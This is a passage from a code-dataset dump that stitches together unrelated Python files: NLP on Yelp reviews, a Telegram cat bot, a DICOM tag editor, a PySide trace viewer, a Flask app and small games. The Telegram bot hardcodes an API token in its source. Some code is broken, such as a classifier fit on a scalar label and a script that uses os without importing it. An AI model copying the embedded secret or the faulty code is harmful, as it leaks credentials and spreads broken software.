)\n#hd.run()\n","sub_path":"other_particles/otherones_build1.py","file_name":"otherones_build1.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"146910308","text":"__author__ = 'sarangis'\n\nfrom mongodb import *\nfrom parallels import *\nfrom bokeh.plotting import figure\nfrom collections import OrderedDict\nfrom bokeh.charts import Bar, output_file, show\nfrom parallel_nlp import *\nfrom sklearn_usage import *\nimport timeit\n\ndef test_database():\n mongo_helper = MongoDBHelper('yelp')\n five_star_reviews = mongo_helper.reviews.query().filter(stars = 5).count().execute().get()\n\n four_star_reviews = mongo_helper.reviews.query().filter(stars = 4).count().execute().get()\n\n three_star_reviews = mongo_helper.reviews.query().filter(stars = 3).count().execute().get()\n\n two_star_reviews = mongo_helper.reviews.query().filter(stars = 2).count().execute().get()\n\n one_star_reviews = mongo_helper.reviews.query().filter(stars = 1).count().execute().get()\n\n xyvalues = OrderedDict()\n xyvalues[\"xy\"] = [one_star_reviews, two_star_reviews, three_star_reviews, four_star_reviews, five_star_reviews]\n x_labels = [\"1 star\", \"2 star\", \"3 star\", \"4 star\", \"5 star\"]\n\n bar = Bar(xyvalues, x_labels, title=\"Review Stars\", xlabel=\"Stars\", ylabel=\"Review\")\n\n output_file(\"reviews.html\")\n\n show(bar)\n\ndef use_my_count_vectorizer():\n # str = \"Well, the canonical approach in Python is to not check the type at all (unless you're debugging).\"\n # str_tokenized = remove_punct(str)\n\n mongo_helper = MongoDBHelper('yelp')\n\n reviews = []\n five_star_review_txt_cursor = mongo_helper.reviews.query().filter(stars = 5).projection(text=1, _id=0).limit(18000).execute().get_cursor() #.dataframe()\n\n for doc in five_star_review_txt_cursor:\n reviews.append(doc[\"text\"])\n\n par_count_vec = ParCountVectorizer()\n par_count_vec.map(reviews)\n\n #for trigram, freq in par_count_vec.trigram_freq.items():\n # print(\"%s:%d\" % ((trigram[0] + \" \" + trigram[1] + \" \" + trigram[2]), freq))\n\n import operator\n sorted_trigrams = sorted(par_count_vec.trigram_freq.items(), key=operator.itemgetter(1))\n top_200 = sorted_trigrams[-200:]\n for i in top_200:\n print(\"%s:%d\" % ((i[0][0] + \" \" + i[0][1] + \" \" + i[0][2]), i[1]))\n\n # for bigram, freq in par_count_vec.bigram_freq.items():\n # print(bigram, freq)\n\n # for unigram, freq in par_count_vec.unigram_freq.items():\n # print(unigram, freq)\n\ndef generate_word_cloud_from_reviews():\n # Doesn't work on Windows yet\n # mongo_helper = MongoDBHelper('yelp')\n # # my_query = mongo_helper.reviews.query().filter(Q(stars = 5) | Q(stars=4)).execute().dataframe()\n # # four_star_reviews = mongo_helper.reviews.query().filter(stars = 4).count().execute().get()\n # # print(my_query)\n # reviews_txt_df = mongo_helper.reviews.query().filter(stars = 4).projection(text=1, _id=0).execute().dataframe()\n # col = reviews_txt_df[\"text\"]\n #\n # txt = \"\"\n # for line in col:\n # txt += \" \" + line\n #\n # from wordcloud import WordCloud\n # word_cloud = WordCloud().generate(txt)\n # word_cloud.to_file(\"wordcloud.png\")\n # plot = figure(width=1000, height=1000)\n # pix = np.array(word_cloud.to_image())\n # plot.image_rgba(image=[pix], x=[0], y=[0], dw=[10], dh=[10])\n # output_file(\"wordcloud.html\")\n pass\n\ndef par_clean_stopwords():\n clean_stopwords()\n\ndef create_sklearn_ngrams():\n from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\n from sklearn.naive_bayes import MultinomialNB\n from sklearn import metrics\n\n print(\"Reading Database\")\n mongo_helper = MongoDBHelper('yelp')\n five_star_review_txt_cursor = mongo_helper.reviews.query().filter(stars = 5).projection(text=1, _id=0).limit(18000).execute().get_cursor() #.dataframe()\n\n reviews = []\n for doc in five_star_review_txt_cursor:\n reviews.append(doc['text'].encode(\"utf-8\"))\n\n reviews = [\"test\", \"train\"] * 13500\n print(reviews)\n total = len(reviews)\n training_range = int(total * 0.75)\n test_range = int(total * 0.25)\n X_train_txt = (reviews[:training_range])\n X_test_txt = (reviews[test_range:])\n\n print(len(X_train_txt))\n\n vectorizer = TfidfVectorizer(min_df=2, ngram_range=(1, 3), stop_words='english', strip_accents='unicode', norm='l2')\n\n X_train = vectorizer.fit_transform(X_train_txt)\n X_test = vectorizer.transform(X_test_txt)\n\n nb_classifier = MultinomialNB(alpha=1,fit_prior=False).fit(X_train, 5)\n y_nb_predicted = nb_classifier.predict(X_test)\n\n print(\"MODEL: Multinomial Naive Bayes\\n\")\n\n print('The precision for this classifier is ' + str(metrics.precision_score(5, y_nb_predicted)))\n print('The recall for this classifier is ' + str(metrics.recall_score(5, y_nb_predicted)))\n print('The f1 for this classifier is ' + str(metrics.f1_score(5, y_nb_predicted)))\n print('The accuracy for this classifier is ' + str(metrics.accuracy_score(5, y_nb_predicted)))\n\n\nif __name__ == \"__main__\":\n create_sklearn_ngrams()\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"306767577","text":"'''\nMIT License\n\nCopyright (c) 2017 Johan Kinnander\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n'''\n\nimport pygame\nfrom pygame.compat import geterror\n\nclass RoverSprite(pygame.sprite.Sprite):\n\timage_path = \"assets/rover.bmp\"\n\n\tdef __init__(self):\n\t\tpygame.sprite.Sprite.__init__(self)\n\n\t\ttry:\n\t\t\tself.image = pygame.image.load(self.image_path)\n\t\texcept pygame.error:\n\t\t\tprint(\"Unable to load image: \" + self.image_path)\n\t\t\traise SystemExit(str(geterror()))\n\n\t\tself.image = self.image.convert()\n\t\tcolorkey = self.image.get_at((0,0))\n\t\tself.image.set_colorkey(colorkey)\n\t\tself.original = self.image\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = 0,0\n\t\tself.orientation = 0\n\n\tdef moveTo(self, x, y):\n\t\tself.rect.topleft = x, y\n\n\tdef setOrientation(self, orientation):\n\t\tcenter = self.rect.center\n\n\t\tself.orientation = orientation\n\n\t\trotate = pygame.transform.rotate\n\t\tself.image = rotate(self.original, self.orientation)\n\t\tself.rect = self.image.get_rect(center=center)\n","sub_path":"visualization/rover_sprite.py","file_name":"rover_sprite.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319056057","text":"import telebot\nfrom telebot import types\nfrom topic_11_telegram_bot.examples.cats.cat_breeds_info import *\n\ntoken = '1184152928:AAFvsnRFoML33KdHGu4xSx_GgQXAZrDueK0'\nbot = telebot.TeleBot(token)\n\n\ndef get_formatted_answer_str(answer_dict):\n return \"Size: {Size}\\n\\nColor: {Color}\\n\\nInfo: {Info}\".format(**answer_dict)\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n markup = types.InlineKeyboardMarkup()\n markup.add(types.InlineKeyboardButton(text='Exotic Shorthair', callback_data=1))\n markup.add(types.InlineKeyboardButton(text='Manx', callback_data=2))\n markup.add(types.InlineKeyboardButton(text='Siberian', callback_data=3))\n\n # Без использования html\n send_mess_start = f\"Привет {message.from_user.first_name}!\\nО какой кошке ты хочешь узнать?\"\n bot.send_message(message.chat.id, send_mess_start, reply_markup=markup)\n\n # С использованием html\n # send_mess_start = f\"Привет {message.from_user.first_name}!\\nО какой кошке ты хочешь узнать?\"\n # bot.send_message(message.chat.id, send_mess_start, parse_mode='html', reply_markup=markup)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef query_handler(call):\n bot.answer_callback_query(callback_query_id=call.id, text='Краткая информация')\n answer = ''\n img = ''\n if call.data == '1':\n answer = get_formatted_answer_str(exotic_shorthair)\n img = 'img/Exotic Shorthair Cat Breed.jpg'\n elif call.data == '2':\n answer = get_formatted_answer_str(manx)\n img = 'img/Manx Cat.jpg'\n elif call.data == '3':\n answer = get_formatted_answer_str(siberian)\n img = 'img/Siberian Cat Breed.jpg'\n\n if img:\n img = open(img, 'rb')\n bot.send_photo(call.message.chat.id, img, answer)\n img.close()\n else:\n bot.send_message(call.message.chat.id, answer)\n\n\n@bot.message_handler(commands=['info'])\ndef info(message):\n send_mess_info = 'Я могу рассказать о нескольких видах котиков.' \\\n '\\nВы можете управлять мной, отправив эти команды:\\n' \\\n '\\n/start - запуск бота и отображение списка котиков' \\\n '\\n/help - расскажет как запустить бота'\n\n bot.send_message(message.chat.id, send_mess_info, parse_mode='html')\n\n\n@bot.message_handler(commands=['help'])\ndef help_com(message):\n send_mess_help = f\"Привет {message.from_user.first_name}!\\nНапиши команду /start\"\n bot.send_message(message.chat.id, send_mess_help, parse_mode='html')\n\n\nif __name__ == '__main__':\n print('Starting bot...')\n bot.polling(none_stop=True, interval=0)\n","sub_path":"topic_11_telegram_bot/examples/cats/cats_bot.py","file_name":"cats_bot.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434275366","text":"from django.db.models import Prefetch\nfrom fb_post.models.post import Post\nfrom fb_post.models.comment import Comment\nfrom .conversion_function_utils import get_post_dictionary\nfrom .validations import is_valid_user_id\n\n\n# Task-14\ndef get_user_posts(user_id, offset, limit):\n\n is_valid_user_id(user_id)\n\n comment_queryset = Comment.objects.select_related('commented_by')\\\n .prefetch_related('reactions')\n\n post_objs = Post.objects.filter(posted_by_id=user_id)\\\n .select_related('posted_by')\\\n .prefetch_related(\n 'reactions',\n Prefetch('comments', queryset=comment_queryset))\\\n [offset:offset+limit]\n\n posts_list = [\n get_post_dictionary(post_obj)\n for post_obj in post_objs\n ]\n\n return posts_list\n","sub_path":"utils/get_user_posts.py","file_name":"get_user_posts.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90534102","text":"def battleship(nmoves,ocean_size):\n from random import randint\n board = []\n for x in range(ocean_size):\n board.append([\"O\"] * ocean_size)\n \n def print_board(board):\n for row in board:\n print (\" \".join(row))\n \n print (\"Let's play Battleship!\")\n print_board(board)\n \n def random_row(board):\n return randint(0, len(board) - 1)\n \n def random_col(board):\n return randint(0, len(board[0]) - 1)\n ship_row = random_row(board)\n ship_col = random_col(board)\n \n # Everything from here on should go in your for loop!\n # Be sure to indent four spaces!\n print('You have '+ str(nmoves) + ' moves')\n for turn in range(nmoves): \n guess_row = int(input(\"Guess Row:\"))\n guess_col = int(input(\"Guess Col:\")) \n if guess_row == ship_row and guess_col == ship_col:\n print (\"Congratulations! You sunk my battleship!\")\n break\n else:\n if (guess_row < 0 or guess_row > ocean_size-1) or (guess_col < 0 or guess_col > ocean_size-1):\n print (\"Oops, that's not even in the ocean.\")\n elif(board[guess_row][guess_col] == \"X\"):\n print (\"You guessed that one already.\")\n else:\n print (\"You missed my battleship!\")\n board[guess_row][guess_col] = \"X\"\n # Print (turn + 1) here!\n print (\"Turn \"+ str(turn))\n print_board(board)\n if turn == (nmoves-1):\n print('-------')\n board[ship_row][ship_col] = \"%\"\n print_board(board)\n print (\"Game Over\")\n \n\nif __name__ == \"__main__\":\n\tbattleship(5,10)\n","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175486030","text":"import random\nimport math\n\nclass Schaffer():\n\tdef __init__(self):\n\t\tself.name = \"Schaffer\"\n\t\tself.x1 = random.uniform(-10, 10)\n\t\tself.inputs = [\tself.x1 ]\n\t\tself.outputs = []\n\t\tself.eqs = [ lambda inputs: \n\t\t\t\t\tmath.pow(inputs[0], 2),\n\t\t\t\tlambda inputs:\n\t\t\t\t\t(math.pow(inputs[0], 2) - 2)]\n\t\t\n\tdef objectives(self):\n\t\tinlist = self.inputs[:]\n\t\toutlist = []\n\t\tfor lamb in self.eqs:\n\t\t\ttemp = lamb(inlist)\n\t\t\toutlist.append(temp)\n\t\tself.outputs = outlist\n\n\t\t\t\t\t\t\t\n\t\t\n#x = Schaffer()\n#x.inputs[0] = 10\n#test = x.objectives()\n#print x.inputs\n#print test\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228624447","text":"from lib.job.Task import Task\n\n\nclass MapTask(Task):\n\n TYPE = 'map_task'\n\n @staticmethod\n def get_name(name):\n return '{}_{}'.format(MapTask.TYPE, name)\n\n @staticmethod\n def update_meta(request, document):\n actual_doc = document.get_document()\n added_requests = [(tuple(x) if isinstance(x, list) else x) for x in actual_doc.get('requests', ())]\n added_requests.append(request)\n actual_doc.update(requests=list(set(added_requests)))\n document.update(actual_doc)\n","sub_path":"lib/job/map/google/MapTask.py","file_name":"MapTask.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63045497","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimages = []\nimg = cv2.imread('water_coins.jpg')\ncv2.imshow('intitial_image' , img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n#images.append(('gray',gray))\nret, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n#images.append(('thresh',thresh))\n\n\n# noise removal\nkernel = np.ones((3,3),np.uint8)\nopening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n\n# sure background area\nsure_bg = cv2.dilate(opening,kernel,iterations=3)\n#images.append(('sure_bg',sure_bg))\n\n# Finding sure foreground area\ndist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\nret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)\n#images.append(('sure_fg',sure_fg))\n# Finding unknown region\nsure_fg = np.uint8(sure_fg)\nunknown = cv2.subtract(sure_bg,sure_fg)\n#images.append(('unknown_area', unknown))\n\n# Marker labelling\nret, markers = cv2.connectedComponents(sure_fg)\n\n# Add one to all labels so that sure background is not 0, but 1\nmarkers = markers+1\n\n# Now, mark the region of unknown with zero\nmarkers[unknown==255] = 0\n#images.append(('markers',markers))\n\nmarkers = cv2.watershed(img,markers)\nimg[markers == -1] = [255,0,0]\n#images.append(('markers', markers))\nimages.append(('final', img))\n\n#retval\t=\tcv.ximgproc.createSuperpixelSLIC(\timage[, algorithm[, region_size[, ruler]]]\t)\n\n\n\nfor x in range(0,len(images)):\n cv2.imshow(images[x][0] ,images[x][1])\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","sub_path":"coin_test.py","file_name":"coin_test.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"625439227","text":"\"\"\"\nIANR - Task2 items 1-4\nexample use cases\n1) python dcmutil.py dcmfile=C:\\DICOM\\IANR.dcm\n2) python dcmutil.py dcmfile=C:\\DICOM\\IANR.dcm updatename=JoeBloggs updateage=17 updategender=F\n3) python dcmutil.py dcmfolder=C:\\DICOM\\brain\n4) python dcmutil.py dcmfolder=C:\\DICOM\\brain applyage=true\n\"\"\"\n\nimport sys\nimport pydicom\nfrom datetime import datetime\n\ninputArgs = {'dcmfile': None, 'dcmfolder': None, 'updatename': None, 'updateage': None, 'updategender': None, 'applyage': None}\n\nif len(sys.argv) >= 2:\n for user_input in sys.argv[1:]: # iterate over argv[1:] (argv[0] is the program name)\n if \"=\" not in user_input:\n 'Args supplied are not in the correct format.... name=value'\n continue\n varname = user_input.split(\"=\")[0]\n varname = varname.lower()\n varvalue = user_input.split(\"=\")[1]\n if varname in inputArgs:\n inputArgs[varname] = varvalue\n else:\n print('\\n@@@ Ignoring input Args: ', user_input)\n\n #print(inputArgs)\nelse:\n print(\"No options supplied\")\n exit(0)\n\ndcmFile = inputArgs.get(\"dcmfile\")\ndcmFolder = inputArgs.get(\"dcmfolder\")\nupdateName = inputArgs.get('updatename')\nupdateAge = inputArgs.get('updateage')\nupdateGender = inputArgs.get('updategender')\napplyAge = inputArgs.get('applyage')\n\n\n### read and print ALL data ###\ndef readDcmTags(dcmFile, display):\n dataset = pydicom.filereader.dcmread(dcmFile)\n if display:\n print(dataset)\n return (dataset)\n\n\ndef modifyTags(dcmFile, updateName, updateAge, updateGender):\n dataset = readDcmTags(dcmFile, False)\n dataset.PatientName = updateName\n dataset.PatientSex = updateGender\n dataset.PatientAge = updateAge\n print(\"Updated: Name:{} - Gender:{} - Age:{}\".format(dataset.PatientName, dataset.PatientSex, dataset.PatientAge))\n ### Update / write DCM file\n dataset.save_as(dcmFile, True)\n ### Verify save is correct\n updateDataset = readDcmTags(dcmFile, False)\n print(\"NewRead: Name:{} - Gender:{} - Age:{}\".format(updateDataset.PatientName, updateDataset.PatientSex, updateDataset.PatientAge))\n\ndef updateFolderContentMetadata(dcmFolder):\n current_date = datetime.today().strftime('%Y%m%d')\n current_time = datetime.today().strftime('%H%M%S')\n print(\"Current Date: {} Time: {}\".format(current_date, current_time))\n\n for file in os.listdir(dcmFolder):\n current_file = os.path.join(dcmFolder, file)\n folderFileData = pydicom.filereader.dcmread(current_file)\n print(\"Current Content Metadata: \", current_file, folderFileData.ContentDate, folderFileData.ContentTime)\n folderFileData.ContentDate = current_date\n folderFileData.ContentTime = current_time\n #Save data back\n folderFileData.save_as(current_file, True)\n #reload to verify\n updatedFileData = pydicom.filereader.dcmread(current_file)\n print(\"Updated Content Metadata: \", current_file, updatedFileData.ContentDate, updatedFileData.ContentTime)\n\ndef getAge(PatientBirthDate, StudyDate):\n BirthDate = datetime.strptime(PatientBirthDate, \"%Y%m%d\")\n StudyDate = datetime.strptime(StudyDate, \"%Y%m%d\")\n Age = StudyDate - BirthDate\n return (int(Age.days/365.25))\n\ndef applyPatientAgeAtStudyDate(dcmFolder):\n for file in os.listdir(dcmFolder):\n current_file = os.path.join(dcmFolder, file)\n folderFileData = pydicom.filereader.dcmread(current_file)\n print(\"Current File:{} Age:{} DOB:{} Study:{}\".format( current_file, folderFileData.PatientAge, folderFileData.PatientBirthDate, folderFileData.StudyDate))\n ageAtStudy = getAge(folderFileData.PatientBirthDate, folderFileData.StudyDate)\n folderFileData.PatientAge = str(ageAtStudy)\n #Save data back\n folderFileData.save_as(current_file, True)\n #reload to verify\n updatedFileData = pydicom.filereader.dcmread(current_file)\n print(\"Updated File:{} Age:{} DOB:{} Study:{}\".format( current_file, updatedFileData.PatientAge, updatedFileData.PatientBirthDate, updatedFileData.StudyDate))\n\n\n## read tags only ##\nif dcmFile and dcmFolder==None and updateName==None and updateAge==None and updateGender==None and applyAge==None:\n readDcmTags(dcmFile, True)\n\n## modify tags as ##\nif dcmFile and updateName and updateAge and updateGender:\n modifyTags(dcmFile, updateName, updateAge, updateGender)\n\n## modify Multiple Files from folder ##\nif dcmFolder and not dcmFile and not applyAge:\n updateFolderContentMetadata(dcmFolder)\n\n## modify Age based on Study Date across folder ##\nif applyAge != None:\n applyAge=applyAge.lower()\n if dcmFolder and applyAge==\"true\" and not dcmFile:\n applyPatientAgeAtStudyDate(dcmFolder)\n\n","sub_path":"dcmUtil.py","file_name":"dcmUtil.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148107917","text":"import pyqtgraph as pg\nfrom PySide.QtCore import QEvent\nfrom PySide.QtGui import QMainWindow, QMessageBox, QMdiArea\nfrom pyqtgraph import FileDialog\n\nfrom inspector.core import context, console_service\nfrom inspector.module import ctx\nfrom inspector.trace.H5Trace import H5TraceSet\nfrom inspector.trace.HDF5Trace import HDF5TraceSet\nfrom inspector.trace.Trace import TraceSetSupport, TraceSet\nfrom inspector.trace.TrsTrace import TrsTraceSet\nfrom inspector.ui.MainWindow import Ui_MainWindow\nfrom inspector.widget.AttributeFileDialog import AttributeFileDialog\nfrom inspector.widget.LinearRegionPlotWidget import LinearRegionPlotWidget\nfrom inspector.widget.ModulesDialog import ModulesDialog\nfrom inspector.widget.StatusBar import RichStatusBar\nfrom inspector.widget.ToolBar import ToolBarModule\nfrom inspector.widget.TraceDisplay import TraceMdiArea, ToolBarTrace\nfrom inspector.window.ModuleEditWindow import ModuleEditWindow\n\n\nclass MainWindow(Ui_MainWindow, QMainWindow):\n \"\"\"\n 主窗口\n \"\"\"\n\n def initSignal(self):\n self.actionOpen.triggered.connect(self.openTrace)\n self.actionSaveAs.triggered.connect(self.saveAs)\n self.mdiAreaTrace.signalSubWindowChanged.connect(self.tcAboutEnable)\n self.toolBarModule.toolButtonSelect.clicked.connect(self.showModulesDialog)\n self.toolBarModule.toolButtonNew.clicked.connect(self.showNewModule)\n\n def initModuleEditWindow(self):\n self.moduleEditWindow = ModuleEditWindow(self)\n\n def initLayout(self):\n self.tabifyDockWidget(self.dockWidgetLog, self.dockWidgetOut)\n self.tabifyDockWidget(self.dockWidgetLog, self.dockWidgetTrace)\n self.dockWidgetLog.raise_()\n\n def initToolBar(self):\n self.toolBarTrace = ToolBarTrace()\n self.toolBar.addWidget(self.toolBarTrace)\n self.toolBar.addSeparator()\n self.toolBarModule = ToolBarModule(ctx)\n self.toolBar.addWidget(self.toolBarModule)\n self.toolBar.addSeparator()\n self.toolBar.addAction(self.actionHelp)\n\n def initStatusBar(self):\n self.setStatusBar(RichStatusBar())\n\n def initMdiArea(self):\n self.mdiAreaTrace = TraceMdiArea(self.overview_trace, self.toolBarTrace, self.statusBar(), parent=self.centralwidget)\n self.mdiAreaTrace.setViewMode(QMdiArea.SubWindowView)\n self.mdiAreaTrace.setObjectName(\"mdiAreaTrace\")\n self.verticalLayoutMain.addWidget(self.mdiAreaTrace)\n\n def initOverview(self):\n self.overview_trace = LinearRegionPlotWidget()\n self.overview_trace.setVisible(False)\n self.verticalLayoutTrace.addWidget(self.overview_trace)\n\n def initTraceSetSupport(self):\n TraceSetSupport.register('trs', TrsTraceSet, 'TRS Trace File')\n TraceSetSupport.register('hdf5', HDF5TraceSet, 'HDF5 Trace File')\n TraceSetSupport.register('h5', H5TraceSet, 'HDF5 Trace File')\n\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n # 修改pyqtgraph默认配置\n # pg.setConfigOption('background', 'w')\n # pg.setConfigOption('foreground', 'k')\n pg.setConfigOptions(antialias=True)\n # self.__trace_overview = TraceOverview(self.verticalLayoutTrace)\n self.context = context.Context(self)\n self.initLayout()\n self.initToolBar()\n self.initOverview()\n self.initStatusBar()\n self.initMdiArea()\n # signal\n self.initSignal()\n # script\n self.server = console_service.start_service()\n self.initModuleEditWindow()\n self.initModulesDialog()\n # self.trace_sets = {} # type:typing.Dict[TraceMdiSubWindow, TraceSet]\n self.__opened_file = {}\n self.__file_index_sed = 0\n self.initTraceSetSupport()\n self.initContext()\n\n # def __enable_toolbar_canvas_ctl(self, n, w):\n # self.toolBarTrace.set_enable(n > 0)\n # if n <= 0:\n # self.toolBarTrace.set_value(1, 1, False)\n\n def closeEvent(self, event: QEvent):\n reply = QMessageBox.question(self, 'Confirm Exit', 'Are you sure you want to exit?', QMessageBox.Yes,\n QMessageBox.No)\n if reply == QMessageBox.Yes:\n self.server.stop()\n self.server.quit()\n self.server.wait()\n self.moduleEditWindow.close()\n event.accept()\n else:\n event.ignore()\n\n def openTrace(self):\n path = AttributeFileDialog(filter=TraceSetSupport.getFilters()).getOpenFileName()\n\n if path is None:\n return\n traceSet = TraceSetSupport.newInstance(path.split('.')[-1], path)\n if traceSet is not None:\n self.mdiAreaTrace.addTraceSet(traceSet)\n self.dockWidgetTrace.raise_()\n else:\n # traceSet = MemTraceSet()\n # traceSet.appendTrace([0,1,2,3],[1,2,3,4],'xx', 'yy', 1, 1, 0)\n # self.mdiAreaTrace.addTraceSet(traceSet)\n # self.dockWidgetTrace.raise_()\n QMessageBox().warning('Warning', 'Unsupported file type.')\n\n def saveAs(self):\n path = FileDialog.getSaveFileName(filter=TraceSetSupport.getFilters())[0]\n if path is None or path == '':\n return\n p= path.split('.')[-1]\n tTraceSet = TraceSetSupport.newInstance(p, path, read=False)\n sTraceSet = self.mdiAreaTrace.activeSubWindow().traceSet # type: TraceSet\n traces = []\n for i in range(sTraceSet.getTraceCount()):\n traces.append(sTraceSet.getTrace(i))\n tTraceSet.setAttribute(sTraceSet.getAttribute())\n tTraceSet.setTraces(traces)\n tTraceSet.saveFile()\n\n def showNewModule(self):\n self.moduleEditWindow.show()\n self.moduleEditWindow.raise_()\n\n # def onclick(self, w):\n # print(w)\n\n def initContext(self):\n ctx.textBrowserOut = self.textBrowserOut\n ctx.textBrowserLog = self.textBrowserLog\n ctx.setMdiAreaTrace(self.mdiAreaTrace)\n ctx.setStatusBar(self.statusBar())\n\n def tcAboutEnable(self, count):\n \"\"\"\n 打开曲线数量相关的启动停用\n :param count:\n :return:\n \"\"\"\n enable = count > 0\n self.toolBarModule.toolButtonSelect.setEnabled(enable)\n self.toolBarModule.toolButtonNew.setEnabled(enable)\n self.actionSaveAs.setEnabled(enable)\n self.actionSave.setEnabled(enable)\n\n def initModulesDialog(self):\n self.modulesDialog = ModulesDialog()\n\n def showModulesDialog(self):\n self.modulesDialog.initModules()\n self.modulesDialog.exec_()\n t, v, p = self.modulesDialog.selectedModule\n self.toolBarModule.setModule(t, v, p)","sub_path":"inspector/window/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":6690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"538273289","text":"import os\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom logging import Formatter\nimport logging.config\n\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n# create the application instance :)\n# here for availability in other packages\napp = Flask(__name__)\n\n\nfrom flask import json\nfrom flask_restful_swagger_2 import Api\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom flasktemplate.services.ExempleResource import ExempleResource\nfrom flasktemplate.utils.db import Db\n\nlogger = logging.getLogger(__name__)\n\n##########################\n# Application configuration\n##########################\n\napp.config.from_object(__name__) # load config from this file , flaskr.py\n\n# Load default config and override config from an environment variable\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'flaskr.db'),\n SECRET_KEY='development key',\n USERNAME='admin',\n PASSWORD='default'\n))\n\n# conf from env var\napp.config.from_envvar('FLASKR_SETTINGS', silent=True)\n\n##########################\n# Logger conf\n##########################\n\n# Flaskr_settings peut contenir le path vers un fichier de conf qui surachargera la conf déclaréé\n\nlog_conf_path = os.path.join(app.root_path, \"./conf/logging.json\")\n# read log configuration\nif os.path.exists(log_conf_path):\n with open(log_conf_path, 'rt') as f:\n config = json.load(f)\n logging.config.dictConfig(config)\n\n#\n# file_handler = RotatingFileHandler('./logs/foo.log', maxBytes=10000, backupCount=1)\n# file_handler.setLevel(logging.INFO)\n# file_handler.setFormatter(Formatter(\n# '%(asctime)s %(levelname)s: %(message)s '\n# '[in %(pathname)s:%(lineno)d]'\n# ))\n#\n# logger.addHandler(file_handler)\nlogger.info(\"!!!!!!!!!!!!!!!\")\nlogger.info(\"!!! started !!!\")\nlogger.info(\"!!!!!!!!!!!!!!!\")\n\n\n##########################\n# Swagger conf\n##########################\n\n\napi = Api(app, api_version='0.0', api_spec_url='/api/swagger')\napi.add_resource(ExempleResource, '/api/users/')\n# api.add_resource(SwaggerResource, '/api/swagger/')\n\nSWAGGER_URL = '/api/docs'\nAPI_URL = 'http://localhost:5000/api/swagger.json'\n\nswaggerui_blueprint = get_swaggerui_blueprint(\n SWAGGER_URL, # Swagger UI static files will be mapped to '{SWAGGER_URL}/dist/'\n API_URL,\n config={ # Swagger UI config overrides\n 'app_name': \"Super Test application override\"\n },\n)\n\napp.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)\n\n\ndef handle404(ctx):\n logger.error('404')\n return \"404\"\n\n\napp.register_error_handler(404, handle404)\n\n\n@app.teardown_appcontext\ndef close_db(error):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Initializes the database.\"\"\"\n db = Db()\n db.init_db()\n print('Initialized the database.')\n\n\n@app.route('/')\ndef show_entries():\n db = Db()\n ldb = db.get_db()\n cur = ldb.execute('select title, text from entries order by id desc')\n entries = cur.fetchall()\n return render_template('show_entries.html', entries=entries)\n\n\n@app.route('/add', methods=['POST'])\ndef add_entry():\n if not session.get('logged_in'):\n abort(401)\n db = Db()\n ldb = db.get_db()\n 